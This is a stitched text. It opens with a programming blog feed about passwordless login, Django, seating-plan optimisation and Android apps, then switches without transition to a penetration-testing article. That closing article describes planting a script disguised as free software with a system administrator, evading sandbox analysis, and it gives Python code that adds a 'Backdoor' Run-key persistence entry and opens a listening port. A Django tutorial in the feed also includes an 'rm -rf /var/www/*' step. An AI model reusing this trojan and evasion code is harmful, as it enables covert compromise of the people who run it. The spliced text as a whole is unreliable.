Step 4 is the same, steps 5 and 6 are eliminated.</p> </li> </ol> <p>There are some additional advantages:</p> <ul> <li><p class="first">By doing email verification every time, we ensure that we still have a working email address. If we use some email/username + password combination for login, we have to add some kind of regular “Is this still your email address?” feature, or find ourselves unable to contact our users.</p> </li> <li><p class="first".</p> <p>So, for example, if we send an email asking for payment, the link can take them straight to the payment page, already logged in. This is the ideal situation, and we can do it with the tiniest amount of work (adding a query parameter to a <span class="caps">URL</span> in an email), because we can just re-use the existing login mechanism.</p> </li> <li><p class="first">There are significant improvements for privacy concerns.</p> <p>A typical email + password login system has some problems when it comes to privacy, because it is often possible for an attacker to determine that a certain person has an account with a web site. This can often be done from several pages on the site:</p> <ol class="arabic simple"> <li>The account creation form</li> <li>The log in form</li> <li>The password reset form</li> </ol> <p>And it can be done in a number of ways:</p> <ol class="arabic simple"> <li>By looking at the different error/validation messages that are returned by these pages, for the cases of existing or non-existing accounts.</li> <li>Even if the messages returned are identical, by doing <a class="reference external" href="">timing attacks</a> on the pages.</li> </ol> <p>Fixing method 1 often results in bad <span class="caps">UX</span>:</p> <img alt="Man getting very mad with computer." class="align-center" src="/blogmedia/computer_rage.gif" /> <p>Fixing method 2 can be very hard. The use of strong password hashing makes a timing attack on the login page trivial if no precautions are taken.
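</p> <p>To illustrate (a generic sketch, not Django’s actual code — the account store here is invented), the usual mitigation is to run the expensive hash whether or not a matching account exists, so both code paths take roughly the same time:</p>

```python
import hashlib
import hmac
import os

def verify_login(accounts, email, password):
    """Password check that does the same hashing work whether or not the
    account exists, so response timing doesn't reveal account existence."""
    record = accounts.get(email.lower())
    # Fall back to a dummy salt/hash so the slow KDF always runs.
    salt = record["salt"] if record else os.urandom(16)
    expected = record["hash"] if record else b"\x00" * 32
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return record is not None and hmac.compare_digest(candidate, expected)
```

<p>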
<a class="reference external" href="">Django</a>, for instance, was vulnerable to this for a long while. It now has <a class="reference external" href="">rudimentary mitigation</a>,.</p> <p>However, with the system described in this post, these attacks, and the <span class="caps">UX</span>.</p> </li> <li><p class="first">On a code level, the amount of code required for this is very small. Compared to the typical alternative (email/username+password, all the forms to manage passwords, password reset etc.), it is tiny. That alone gives big maintenance and security advantages.</p> </li> </ul> </div> <div class="section" id="disadvantages"> <h2>Disadvantages</h2> <p>There are of course some disadvantages:</p> <ul> <li><p class="first">Not all users have secure email systems, and emails could be intercepted, allowing an attacker to use someone else’s account. As noted already, you are living with the same issue if you have a password-reset-via-email-link feature.</p> </li> <li><p class="first".</p> </li> <li><p class="first".</p> <p.</p> </li> </ul> </div> <div class="section" id="implementation-issues"> <h2>Implementation issues</h2> <p>There are some implementation issues to be aware of, especially security related:</p> <ol class="arabic"> <li><p class="first">You need a correct and secure way of creating the unique login links. They need to contain some kind of token that verifies an email address, a token which cannot be guessed by an attacker.</p> </li> <li><p class="first">The login links should expire — so that a temporary breach of someone’s email account, or accidentally sharing the link, doesn’t give an attacker login access forever.</p> </li> <li><p class="first">When comparing the token, you need to be aware of timing attacks.</p> </li> <li><p class="first">Security tokens in URLs are a dangerous thing, as they can easily be pinched.
It can happen when a user copy-pastes or shares a <span class="caps">URL</span>, and it can happen if a page linked to has any 3rd party resources, which will then be able to see the <span class="caps">URL</span> (and the token) via the Referer header.</p> <p>Because of this, the token should be checked before any page is rendered, and you should redirect immediately, either to a failure page if it doesn’t match, or to a <span class="caps">URL</span> without the token. If you use a query string parameter for the token, this is easy — for the success case you just return an <span class="caps">HTTP</span> redirect response to the same <span class="caps">URL</span> but without the token query parameter (and with a login cookie attached to the response).</p> </li> <li><p class="first">You should do a case-insensitive comparison on email addresses when looking for an existing account — people don’t always type their email addresses with the same case.</p> </li> <li><p class="first".</p> </li> </ol> <p>In my implementation, I use Django’s <a class="reference external" href="">TimestampSigner</a> to sign the email address. This takes care of <strong>1</strong> (Django uses an <span class="caps">HMAC</span> on the string), <strong>2</strong> (you just pass the <tt class="docutils literal">max_age</tt> parameter to <tt class="docutils literal">unsign</tt>) and <strong>3</strong> (Django’s <tt class="docutils literal">Signer</tt> uses a <tt class="docutils literal">constant_time_compare</tt> function <a class="reference external" href="">internally</a>).</p> <p>I then base64 encode the result to produce a tidy <span class="caps">URL</span>. This results in a longish <span class="caps">URL</span>, but not so long as to be impractical. I created a <a class="reference external" href="">small class</a> to wrap up the encoding and decoding.</p> <p>(An alternative would be to create a nonce and store it in a database on the server, associated with the email address.
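</p> <p>For concreteness, here is a rough, framework-free sketch of the same signed-token idea using only the Python standard library — my actual implementation uses Django’s <tt class="docutils literal">TimestampSigner</tt> instead, and all names here are invented:</p>

```python
import base64
import hashlib
import hmac
import time

SECRET_KEY = b"keep-this-secret"  # hypothetical; Django would use settings.SECRET_KEY

def make_login_token(email):
    """Sign email + timestamp so the login link can't be forged."""
    payload = "%s|%d" % (email.lower(), int(time.time()))
    sig = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(("%s|%s" % (payload, sig)).encode()).decode()

def check_login_token(token, max_age=3600):
    """Return the email for a valid, unexpired token, otherwise None."""
    try:
        blob = base64.urlsafe_b64decode(token.encode()).decode()
        payload, sig = blob.rsplit("|", 1)
        email, timestamp = payload.rsplit("|", 1)
        timestamp = int(timestamp)
    except ValueError:
        return None
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):  # timing-safe comparison
        return None
    if time.time() - timestamp > max_age:       # expired link
        return None
    return email
```

<p>As in the Django version, the signature handles issue <strong>1</strong>, the timestamp issue <strong>2</strong>, and <tt class="docutils literal">compare_digest</tt> issue <strong>3</strong>.</p> <p>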
The implementation above has the advantage that it doesn’t require server side resources, but the disadvantage of requiring a longer <span class="caps">URL</span>).</p> <p>I do the checking in a <a class="reference external" href="">middleware</a>, including the redirect to handle item <strong>4</strong> above. I currently use Django’s signed cookies for implementing login. If a server side session was used, then it would be easier to implement “log out from all devices”.</p> <p>I’m using a custom model for this account, which does not have a password field, and I’m also using a normal <tt class="docutils literal">User</tt> model for other purposes, so it doesn’t make sense for me to release this as a standalone Django authentication library. But feel free to take the code and do so, or borrow in any other way.</p> <p>There are other variations on this that could be used, but I think the basic pattern is very useful for some use cases, eliminating a lot of the user hassles and programmer headaches often found with passwords.</p> <p>This is also not meant to be an alternative to things like OAuth. It is meant to be an alternative to email+password logins. If OAuth is used as well (should you venture down that <a class="reference external" href="">somewhat</a> <a class="reference external" href="">dubious</a> <a class="reference external" href="">path</a>), then enhancements are possible — for instance, for people who create accounts via OAuth, there could be the option to disable login by email link.
This would mitigate the risk of account takeover due to people with insecure email providers.</p> <hr class="docutils" /> <p>Updates:</p> <ul class="simple"> <li>2016-07-18: Note about alternatives like OAuth2</li> <li>2016-07-18: Note about implementing “log out from all devices”</li> <li>2016-07-19: Note about security of email services.</li> <li>2016-07-19: Paragraph about prior art</li> </ul> <p>(Thanks to reddit comments for the prompts that pointed some of these issues out).</p> </div> How to learn Django without installing anything2014-06-03T14:40:24+00:002014-06-03T14:40:24+00:00Luke Plant<p class="first last">Pretty much what it says in the title…</p> <p>Here is a way of learning to create a website using the <a class="reference external" href="">Django</a> web framework without having to install anything on your local computer.</p> <p>This might be useful if:</p> <ul class="simple"> <li>you are intimidated by all the hurdles you need just to get to the beginning of the tutorial.</li> <li>you can’t install things on your own computer.</li> <li>or you want to be able to carry on with the learning from a different computer, without copying your progress or installing things on the other computer.</li> </ul> <div class="section" id="prerequisites"> <h2>Prerequisites</h2> <ul> <li><p class="first">I’m assuming you already know how to program in Python, or are sufficiently experienced with programming that you don’t mind learning Python while learning Django at the same time. If not, have a look at these starting points:</p> <p>If you don’t know much about programming, try <a class="reference external" href="">Learn Python The Hard Way</a>.</p> <p>If you are experienced with other programming languages, but not Python, try <a class="reference external" href="">Dive Into Python</a>.</p> </li> <li><p class="first">I’m assuming you are reasonably comfortable with typing things into a command prompt or terminal.
Thankfully, even if you are not, you’ll be doing everything in a virtual machine somewhere on the internet, so you can’t break anything!</p> </li> </ul> </div> <div class="section" id="steps"> <h2>Steps</h2> <ul> <li><p class="first">Go to <a class="reference external" href=""></a> and sign up for an account.</p> </li> <li><p class="first">Create a new project, choosing ‘Django’.</p> </li> <li><p class="first">You’ll be presented with an almost empty Django project, complete with a terminal. You can browse and edit files, and type commands at the terminal, and press the big green ‘Run’ button to run your site and view pages in another tab.</p> <p>However, we first want to remove some things so that we can follow the Django tutorial exactly.</p> <p>In the terminal, type the following commands and hit enter. First, delete all the files created in <tt class="docutils literal">/var/www</tt>:</p> <div class="highlight"><pre class="code bash literal-block"><span></span>rm -rf /var/www/* </pre></div> <p>Next, we need to upgrade Django, because runnable.com installed an old version:</p> <div class="highlight"><pre class="code bash literal-block"><span></span>pip install --upgrade Django </pre></div> </li> <li><p class="first">Now, open up the Django docs and start the tutorial, from part 1:</p> <p><a class="reference external" href=""></a></p> </li> </ul> </div> <div class="section" id="adjustments"> <h2>Adjustments</h2> <p>Because you are running on runnable.com, rather than your own computer, you’ll need to make some very slight adjustments to the instructions at certain places:</p> <ul> <li><p class="first">Ignore the comment about not putting files in <tt class="docutils literal">/var/www</tt> — while it should be followed in general, it will make it hard for you to edit files on code.runnable.com if you put them outside <tt class="docutils literal">/var/www</tt>.</p> </li> <li><p class="first">After you have run <tt class="docutils literal">startproject</tt> in the
tutorial, you will need to find the <tt class="docutils literal">settings.py</tt> file and make an adjustment. Find the block that defines <tt class="docutils literal">MIDDLEWARE_CLASSES</tt> and remove the line:</p> <div class="highlight"><pre class="code python literal-block"><span></span><span class="s1">'django.middleware.clickjacking.XFrameOptionsMiddleware'</span><span class="p">,</span> </pre></div> <p>This middleware is an important security feature, but it interferes with the way that runnable.com displays your project in a frame (in its normal workflow), and without this change you will be presented with a blank page after you press ‘Run’.</p> </li> <li><p class="first">When it comes to running your Django project, the easiest way is to use the green ‘Run’ button, but adjust the command. Click on the gear icon to configure it, and change the command to:</p> <pre class="literal-block"> cd /var/www/mysite; python manage.py runserver 0.0.0.0:80 </pre> <p>Now press the ‘Run’ button.</p> </li> </ul> <p>And that’s it! You should be able to complete the tutorial with these adjustments.</p> </div> <div class="section" id="what-next"> <h2>What next?</h2> <p>I hope this has been helpful! Please comment with any corrections.</p> <p>To go further, you’ll probably want to have a look at <a class="reference external" href="">Getting started with Django</a>.</p> </div> Wedding hacks - seating planner using simulated annealing2013-09-06T23:50:07+00:002013-09-06T23:50:07+00:00Luke Plant<p class="first last">Some attempts to solve the seating headache with software.</p> <p>This is the third in a series of posts in which my upcoming wedding has exercised my programming skills.</p> <div class="section" id="the-problem"> <h2>The problem</h2> <p>There are a lot of ways to seat approx 130 guests in tables of 10.</p> <p>(Digression: how many ways?</p> <p>There are n!
ways to order a list of n people.</p> <p>However, we then group that list of n people into j groups (tables) of size k each (assuming an exact division is possible for simplicity).</p> <p>In each group, there are k! different ways to order the people, but all these are considered equivalent for our purposes (we don’t care what order people are listed within a table). So we divide by k!, and do it j times, once for each table.</p> <p>We could then shuffle all the groups, and all the results of such shuffling are also considered equivalent. So we divide by j! to account for these permutations.</p> <p>So, I make it: n!/((k!^j)*j!)</p> <p>(You can get the same formula by considering ‘n choose k’ to choose the people for the first table, multiplied by ‘(n-k) choose k’, for the second, etc., with n reducing by k each time as the pool of available people shrinks, dividing by j! to account for permutations of tables, and simplifying).</p> <p>Or, in my case:</p> <p>130!/((10!^13)*13!)</p> <p>Or:</p> <p>5.489002294953296e+124</p> <p>But my maths is shockingly bad — corrections in comments are welcome!
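</p> <p>The formula is easy to sanity-check in Python (here with n=130, k=10 and j=13 — 130 guests at 13 tables of 10):</p>

```python
from math import factorial

def seatings(n, k, j):
    """Ways to split n people into j unordered tables of k each: n!/((k!^j)*j!)"""
    assert n == j * k
    return factorial(n) // (factorial(k) ** j * factorial(j))

assert seatings(4, 2, 2) == 3        # {ab|cd, ac|bd, ad|bc} — checkable by hand
print(float(seatings(130, 10, 13)))  # ≈ 5.489e+124, matching the figure above
```

<p>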
Whether I’ve got it right or not, there are still definitely lots of potential arrangements…</p> <p>[Edit 2014-02-28: previous incorrect formula got me a larger figure, 2.201437978814401e+202]</p> <p>End of digression…)</p> <p>So, we haven’t got into the business of doing the table plan yet, but this is such a nice programming puzzle that I couldn’t resist starting now (and we probably need to get a move on if we are to get this done…).</p> <p>I found one commercial solution, <a class="reference external" href="">Perfect Table Plan</a>, but:</p> <ul class="simple"> <li>It doesn’t run on Linux :-(</li> <li>It’s not free</li> <li>It’s already written, which is half the fun!</li> </ul> <p>I found a <a class="reference external" href="">paper</a> tackling the problem, but:</p> <ul class="simple"> <li>No source code!</li> <li>It required a commercial software package, <span class="caps">GAMS</span> with the <span class="caps">CPLEX</span> solver.</li> <li>On some pretty hefty hardware, running the solver still took 36 hours.</li> </ul> <p>So I wrote my own. I used a model very similar to the one given in the paper, with some tweaks.</p> <p>The idea is that you define a matrix of connections, with a zero indicating that the people don’t know each other, 1 that they do know each other, plus 50 indicating that they must be together, and negative numbers for people who should be kept apart!</p> <p>You then use this matrix to rate different potential seating plans — essentially trying to maximise the strength of connections on tables, summed over all people. In order to explore the possible solutions, I’m using <a class="reference external" href="">simulated annealing</a>, and a <a class="reference external" href="">simulated annealing Python module</a> that I found.</p> </div> <div class="section" id="user-interface"> <h2>User interface</h2> <p>Defining a matrix for how 130 people know each other is a challenge.
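</p> <p>The rating scheme and the annealing “move” are only a few lines each — a rough sketch, with a data layout invented for illustration (tables as lists of person indices, <tt class="docutils literal">conn</tt> as the connection matrix):</p>

```python
import random

def plan_score(tables, conn):
    """Rate a plan: sum connection strengths over pairs seated at each table."""
    total = 0
    for table in tables:
        for i, a in enumerate(table):
            for b in table[i + 1:]:
                total += conn[a][b]  # 0 strangers, 1 friends, 50 must-sit-together
    return total

def move(tables, rng=random):
    """Annealing move: swap two random people between two random tables."""
    t1, t2 = rng.sample(range(len(tables)), 2)
    i = rng.randrange(len(tables[t1]))
    j = rng.randrange(len(tables[t2]))
    tables[t1][i], tables[t2][j] = tables[t2][j], tables[t1][i]
```

<p>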
I’ve created a <span class="caps">UI</span> with a grid, and added controls to make it easy to enter connections for groups of people together. This provides a reasonable solution, but a 130x130 grid is a bit of a pain.</p> <p>The <span class="caps">UI</span> is all in a web browser, with the main algorithmic code running server side, written in Python. I’ve used <a class="reference external" href="">Flask</a> as the web framework, instead of <a class="reference external" href="">Django</a> which I almost always use, since it is nice and light, and I don’t need an <span class="caps">ORM</span> or admin etc.</p> <p>I also discovered a few tricks along the way.</p> </div> <div class="section" id="web-tricks"> <h2>Web tricks</h2> <p.</p> <p>For downloading data, I’ve found a trick using an iframe with an auto-submitting <span class="caps">POST</span>.</p> <p>For uploading data, within a single page app, there is now a way to do this <a class="reference external" href="">using <span class="caps">XHR</span></a>, at least for modern browsers. I then have a simple view which again just echoes the data back client-side, allowing me to use a browser’s normal file upload mechanism to get the data back into the client-side app.</p> </div> <div class="section" id="algorithm"> <h2>Algorithm</h2> <p.</p> <p.</p> <p>So, basically, it is too utilitarian. Or it doesn’t weigh the misery of being alone strongly enough.</p> <p>Second, I suspect that the solution space is just too large to explore. Simulated annealing requires you to define a ‘move’ function, to change the system from one state to a nearby one. I just swap two random people on two random tables.</p> <p.</p> <p.</p> <p>I have very little experience with this kind of code, so it is fun to be stretched in this direction!</p> </div> <div class="section" id="pypy"> <h2>PyPy</h2> <p>Since this is highly algorithmic code, I experimented with PyPy.</p> <p>Initially I found PyPy was actually a bit slower.
However, my code uses lists of integers to represent people, and originally I used ‘None’ as a sentinel value to represent an empty seat. I realised this might be killing PyPy’s <span class="caps">JIT</span>. Switching to a sentinel value of ‘-1’ gave me approximately 5x to 10x improvement with PyPy. So it is now worth using PyPy.</p> <p>Other than that one optimisation, I’ve done very little, so there are probably big ways the code could be improved.</p> </div> <div class="section" id="source-code"> <h2>Source code</h2> <p>It’s all free, and on BitBucket:</p> <p><a class="reference external" href=""></a></p> …</p> <p>[Update: having let it work for a longer run of a few hours, the results are surprisingly good. It has at least managed to satisfy all of the ‘50’ connections, grouping families of up to 6 together, and managing to get other ‘50’ couples onto the same table. And so far, the only examples I can find of people without any friends on a table are people for whom I haven’t put in any connection info yet. I’m impressed! But it still lacks that human touch…]</p> </div> Wedding hacks - John Lewis gift list hyperlink2013-09-06T23:12:50+00:002013-09-06T23:12:50+00:00Luke Plant<p class="first last">Using my programming skills for higher purposes, part 1</p> <p>I’m getting married in 3 weeks time - yay!</p> <p>But this post isn’t about that — it’s a quick programming-and-wedding-related tip.</p> <p>We set up a <a class="reference external" href="">John Lewis gift list</a>, but we found the web site’s instructions for use could be improved.</p> <p>The instructions to pass on to potential givers were:</p> <ol class="arabic simple"> <li>Go to this site</li> <li>Type in this gift list number</li> </ol> <p>That’s fine for printed instructions, but if you already have a website, there is this magical thing called a <strong>hyperlink</strong> which should be able to take you straight there, without any error prone typing etc. 
John Lewis didn’t provide any instructions for doing this, and as the number never appears in a <span class="caps">URL</span>, even after this point, it isn’t obvious that there is a way to do it.</p> <p>However, I managed to impress my fiancée with my leet hacking skills to get around this. <span class="caps">OK</span>, so I right clicked at an appropriate place, chose “Inspect element”, applied some knowledge of web development and made a few easy guesses. I came up with the following <span class="caps">URL</span> which works, and will take you straight to your gift list:</p> <p><tt class="docutils literal"><span class="pre"><span class="caps">YOURNUMBER</span></span></tt></p> <p>Just replace <span class="caps">YOURNUMBER</span> with your actual number.</p> <p>That’s all for now - but further wedding-inspired posts are to follow!</p> MVC is not a helpful analogy for Django2013-06-25T13:22:01+00:002013-06-25T13:22:01+00:00Luke Plant<p class="first last">We should just introduce people to <span class="caps">MVT</span></p> <p>Sometimes <a class="reference external" href="">Django</a> is described as <span class="caps">MVC</span> — Model-View-Controller. The problem with that is that people will either:</p> <ul class="simple"> <li>come with baggage from existing <span class="caps">MVC</span> frameworks, which might be nothing like Django,</li> <li>or end up at something like the <a class="reference external" href="">wikipedia page on <span class="caps">MVC</span></a>, which describes an architecture which is very unlike Django’s.</li> </ul> <p>The classic <span class="caps">MVC</span> architecture is about managing state. Suppose you have a <span class="caps">GUI</span> that allows you to, say, view and edit a drawing:</p> <ul class="simple"> <li>You’ve got to store the drawing in memory somewhere.</li> <li>You’ve got to display the drawing on the screen.</li> <li>You have controls that allow you to modify the drawing e.g. 
change the colour of a shape.</li> <li>And you’ve got to display the changes when that happens.</li> </ul> <p>The controller tells the model to change, and the model notifies the view in some way (preferably by some kind of pub/sub mechanism that allows the view to be fairly decoupled from the model).</p> <p><span class="caps">MVC</span>.</p> <p>Django’s Model-View-Template is quite different from this.</p> <p>In <span class="caps">MVT</span>, there is no state. There is only data. For the purposes of most <span class="caps">HTTP</span> requests (<span class="caps">GET</span> requests), the data in the database is treated as an immutable data input, not state. It could be said that the name ‘view’ is misleading, since it implies reading, not writing, i.e. <span class="caps">GET</span> requests not <span class="caps">POST</span> requests. A better name might be ‘handler’, because it handles an <span class="caps">HTTP</span> request, and that is the terminology used by most Django <span class="caps">REST</span> frameworks.</p> <p>In <span class="caps">HTTP</span>,.</p> <p>But when it comes to responding to an <span class="caps">HTTP</span> request, Django’s <span class="caps">MVT</span> has a complete lack of state. Many web pages are essentially pure functions of the inputs — an <span class="caps">HTTP</span> request and the data in the database — so it is clear that <span class="caps">MVT</span> is not intrinsically about state.</p> <p>Of course, there is data modification. <span class="caps">POST</span>:</p> <ul class="simple"> <li>throws away all the state (i.e. the current state of the browser), with the exception of the pieces of state that identify what the user was looking at - the <span class="caps">URL</span>, and the site’s cookies.</li> <li>causes a brand new <span class="caps">HTTP</span> request asking for the document. 
The server responds completely from scratch: it doesn’t notify the view function or the template, it starts over from the beginning.</li> </ul> <p>So, if anything changed, the approach is “cancel everything, start again from the beginning”.</p> <p>And for the actual handling of <span class="caps">POST</span> requests within Django, you have a similar approach. Once the data has been updated (typically, a <span class="caps">SQL</span> <span class="caps">INSERT</span> or <span class="caps">UPDATE</span>), you send back an <span class="caps">HTTP</span> redirect to do a <span class="caps">GET</span> — “something changed, let’s start again from the beginning”. This is why Django’s <span class="caps">ORM</span> <a class="reference external" href="">does not have an identity mapper</a>. The model for handling state is to ignore it altogether, and just start again whenever you know that something has changed.</p> <p>This is exactly the opposite of the way classic <span class="caps">MVC</span> apps work (including client-side, Javascript <span class="caps">MVC</span> frameworks) — they are all about avoiding starting again, and having live systems that can be informed about updates and keep everything in sync, by sending messages between them.</p> <p>There is a second aspect to <span class="caps">MVC</span>, which is separation of concerns. If you think of <span class="caps">MVC</span> as meaning “separation of code that stores data, code that displays data, and code that handles requests for data to be changed or displayed”, then Django does indeed fit that pattern.</p> <p>But I don’t think the classic description of <span class="caps">MVC</span> is a helpful starting point at all. <span class="caps">HTTP</span> is different, and has its own needs which have given birth to its own architectures.</p> <div class="section" id="what-difference-does-this-make"> <h2>What difference does this make?</h2> <p>First, we can avoid unhelpful comparisons that just confuse.
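</p> <p>To make the contrast concrete: a Django view is just a function from request to response (a minimal sketch — the view name and greeting are invented):</p>

```python
from django.http import HttpResponse

def hello(request):
    # An HTTP request comes in, an HTTP response goes out — there is no
    # live model/view wiring to keep in sync between requests.
    return HttpResponse("Hello, %s" % request.GET.get("name", "world"))
```

<p>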
The best way to understand how <span class="caps">MVT</span> works is to try it. You have to learn something about <span class="caps">HTTP</span> - a view function is a bit of code that handles an <span class="caps">HTTP</span> request and returns an <span class="caps">HTTP</span> response. Analogies to systems that are not like <span class="caps">HTTP</span> are not going to help that much.</p> <p>Second, we can avoid trying to shoe-horn Django applications into a mold created by a different architecture. I believe <span class="caps">MVC</span> apps will provide very little guidance about how to structure code in Django apps.</p> <p>In particular, I kind of disagreed with the post <a class="reference external" href="">Know Your Models</a> by Hynek Schlawack. It starts with the assumption of classic <span class="caps">MVC</span> and what <span class="caps">MVC</span> is supposed to enable you to do.</p> <p>I do agree with the approach of creating an <span class="caps">API</span> on your models that you want to use from view functions. So, for example, I tend to eschew all direct <tt class="docutils literal">.filter()</tt> calls in view functions, preferring methods on models that can be tested independently. But I think the analogy with <span class="caps">MVC</span> can lead you in an unhelpful direction for many Django apps.</p> <p>So, to contradict Hynek:</p> <ul> <li><p class="first".</p> <p>Further, if you put business logic in separate classes, rather than on your Django Model, it will be hard to re-use it in the admin and other ModelForms.</p> </li> <li><p class="first">In my experience, the data model usually <em>has</em> been constructed with your application in mind. If it hasn’t, you are going to have an extremely painful time.</p> <p>If your database allows only one email address per customer, then your application is going to reflect that.
If your schema changes so that now you have multiple, the change will ripple right the way through your application (in most cases). <span class="caps">MVT</span> is not supposed to insulate you from that.</p> <p>You can’t really build an application on top of a database that wasn’t designed for it, unless you are using it as a key-value store or something.</p> </li> <li><p class="first">The database isn’t global state, it is global data. It doesn’t vary over the lifetime of an <span class="caps">HTTP</span> request being handled. As soon as it has changed, you send a redirect and start again.</p> </li> </ul> <p>Hynek’s approach can be necessary sometimes, but it adds a layer of complexity and indirection that itself can be deadly. Sometimes this is even worse for bigger projects — you are adding more complexity and indirection to a project that was already large.</p> <p>When I write Django apps, I’m regularly making changes to the database schema, constantly making it match the exact and changing needs of the application. It is then easy to use the Django Model as a great basis for an <span class="caps">API</span>, and keep things as simple as possible.</p> <p>There are other differences of approach in this, of course. Do you regard the database as merely a persistence mechanism for your application, or do you regard the database as an integral part of your application — probably the most important part?</p> <p>I actually tend towards the latter — to call an <span class="caps">RDBMS</span> like Postgres a persistence mechanism is pretty insulting. That means I lean far more heavily on the database, so that I’m not embarrassed to make use of an extremely powerful <span class="caps">RDBMS</span> that can do all kinds of things, like constraint checking, transactions, triggers etc.
With that mindset, testing your application by necessity involves testing what happens to your database for different <span class="caps">HTTP</span> inputs, rather than simply checking a ‘model layer’.</p> <p>If there are bits of logic that can be separated out easily from the database, and tested more easily, by all means do that. But I wouldn’t make that the goal of my architecture.</p> </div> Full screen WebView Android app2012-12-19T23:08:00+00:002012-12-19T23:08:00+00:00Luke Plant<p class="first last">A complete WebView Android app, full screen, with a progress bar and back button that works as normal</p> <p>I decided to make an Android app for my <a class="reference external" href="">Bible memory verse site</a>.</p> <p>I tried <a class="reference external" href="">appsgeyser</a>, but discovered they put adverts on your site, which I definitely don’t want — this is an entirely free app, for a free (and ad-free) site.</p> <p>My requirements are:</p> <ul class="simple"> <li>Full screen<ul> <li>without any controls ever popping up, because you don’t need them.</li> </ul> </li> <li>Progress bar for page loading.</li> <li>Javascript works.</li> <li>Links work as expected.</li> <li>Back button works like the built-in browser, until you get back to the home page, where it will cause the app to exit.</li> </ul> <p>There are lots of pages and wizards with solutions for bits of these, but putting them together turned out to be harder — for example, it seems that the normal way of showing a progress bar for the whole window doesn’t work if you’ve gone full screen.</p> <p>Anyway, I’ve completed the <a class="reference external" href="">learn scripture app</a> (ha, my first Java app!), and thought I’d share the <a class="reference external" href="">complete source code</a>.</p> <p>If you want a similar app, you are probably best off creating your basic app structure using a wizard, but it is helpful to see a complete solution.
The important bits are:</p> <ul class="simple"> <li>permissions for Internet access: <a class="reference external" href="">AndroidManifest.xml</a></li> <li>the <a class="reference external" href="">main activity source code</a></li> <li>the <a class="reference external" href="">main layout definition</a></li> </ul> Reasons to love Django, part x of y2012-05-19T14:12:19+00:002012-05-19T14:12:19+00:00Luke Plant<p class="first last">I’ve probably written lots of blog posts on this, so I can’t claim ‘x’ = 1, and I’ve no idea what ‘y’ is…</p> <p>I needed to add a boolean field to a model. For many web apps, this typically involves:</p> <ol class="arabic simple"> <li>modifying the model layer, so that the field becomes available as an attribute on retrieved objects, and can be queried against etc.</li> <li>creating a database migration script that can be run immediately on the development box, and later for staging and production.</li> <li>running the migration against the development <span class="caps">DB</span>.</li> <li>updating any admin screens for editing the field.</li> <li>checking the changes and scripts into source control.</li> <li>deploying - including pushing source code and running migration scripts etc.</li> </ol> <p>Using <a class="reference external" href="">Django</a>, from a cold start (no editor/<span class="caps">IDE</span> open), this just took me <strong>1 minute 45 seconds of work</strong> for steps 1 - 5, and an additional 45 seconds waiting for step 6, total 2 minutes 30 seconds, and I wasn’t rushing.</p> <p>Step 1 is a one line code addition.
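</p> <p>For example (field, model and app names invented — this was with South, pre-dating Django’s built-in migrations):</p>

```python
# models.py — step 1 is one line on an existing model:
class Contact(models.Model):
    name = models.CharField(max_length=100)
    is_archived = models.BooleanField(default=False)  # the new line

# Steps 2 and 3 are then one-liners with South:
#   ./manage.py schemamigration contacts --auto
#   ./manage.py migrate contacts
```

<p>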
Pretty much everything else can and should be generated automatically.</p> <p>Step 2 is taken care of by a one line command using <a class="reference external" href="">South</a>, as is step 3 and the database part of step 6 (which is run de-rigueur from my deployment scripts).</p> <p>Step 4 is taken care of by Django’s admin, which introspects the model and generates the right form for you.</p> <p>This is one of the reasons I love Django. It’s not so much the time it saves, although that is pretty awesome, it’s the <em>tedium</em> it saves.</p> <p>This is also one of the reasons I’m not very tempted by schema-less or schema-light databases, because with Django a nice strict schema brings so little administrative overhead. I was going to have to add <em>something</em> about the change to the model anyway, even if it was only documentation, and having done that in one place, the other additional changes required by a relational <span class="caps">DB</span> with strong schema placed virtually no burden on me.</p> <p>(Of course, things could be more complex on bigger apps, especially if the table is large or sharded. But then again, there’s no reason why rolling out your <span class="caps">DB</span> change shouldn’t be just as automated - it’s only the ‘waiting’ stage that <em>has</em> to take longer for a simple change like adding a column. 
If the coding/work part is taking much longer than the above example, your tools probably need fixing or replacing.)</p> WordShell - WordPress command line admin utility (2012-05-10, Luke Plant)<p class="first last">A nice tool developed by a friend of mine.</p> <p>A friend of mine has developed a <a class="reference external" href="">command-line utility for managing many WordPress installations - WordShell</a>.</p> <p>I don’t use WordPress myself, but having been totally converted to tools like <a class="reference external" href="">fabric</a> for managing remote sites, I’m sure this tool would be invaluable if you need to manage WordPress sites.</p>
Introduction
With the increasing use of sandbox technology, every penetration tester should be prepared to face it one day. While plenty of pentest tools are out there, forging your own code can help in those tough cases where such tools fail.
Recently we’ve been doing a black-box penetration test for one of our clients, where social engineering and client-side attacks were allowed. During the information gathering phase, we suspected that they were using sandbox technology along with a signature-based AV to protect a specific, critical -obviously- part of the domain. Thankfully, our reconnaissance revealed that one of the system admins was searching around in forums for free software to automate a certain task. The task was doable; however, bypassing sandbox analysis was my main concern. Let’s see how useful that finding was for us and take a closer look at the coding part!
In this article, I will share the part of the code which I actually used to trick the sandbox and gain the administrator’s trust to run the script. Please keep in mind that the actual script contained the task which the admin was seeking in the first place; otherwise it would have raised her suspicions.
Approach
Below are some methods used by malware developers to detect and escape from Sandbox environment as documented by FireEye researchers:-
-.
In our scenario, using a human interaction method was the most suitable one. Since our victim was looking for a script that we will provide in the first place, it wouldn’t hurt to add a simple check-box dialog to provide some options where the victim has to choose in order to proceed for code execution.
Action Plan
- Create a script that makes changes to the OS, such as opening a port and add a registry value.
- Submit it against online Sandbox analyzer, such as Malwr, which is based on open source Cuckoo.
- Add the evasion technique to our script.
- Test again and see the difference.
Phase 1, 2
One of the favorite things for a hacker is to add a registry key for persistence purpose. There must also be a way to communicate between the hacker and his victim. Let’s write up a quick Python code to parse windows registry and add a string value, as well as open a TCP port.
import _winreg as wreg
import socket

# part 1
key = wreg.OpenKey(wreg.HKEY_CURRENT_USER,
                   "Software\Microsoft\Windows\CurrentVersion\Run",
                   0, wreg.KEY_ALL_ACCESS)
wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ, 'C:\\bla.exe')
key.Close()

# part 2
s = socket.socket()
host = socket.gethostname()
port = 80
s.bind((host, port))
s.listen(5)
The code is quite simple. In the first part we open the registry key Software\Microsoft\Windows\CurrentVersion\Run, then add a string value called “Backdoor” whose data value points to an executable path ('C:\\bla.exe').
The second part simply opens port 80 and listens for incoming connections on it.
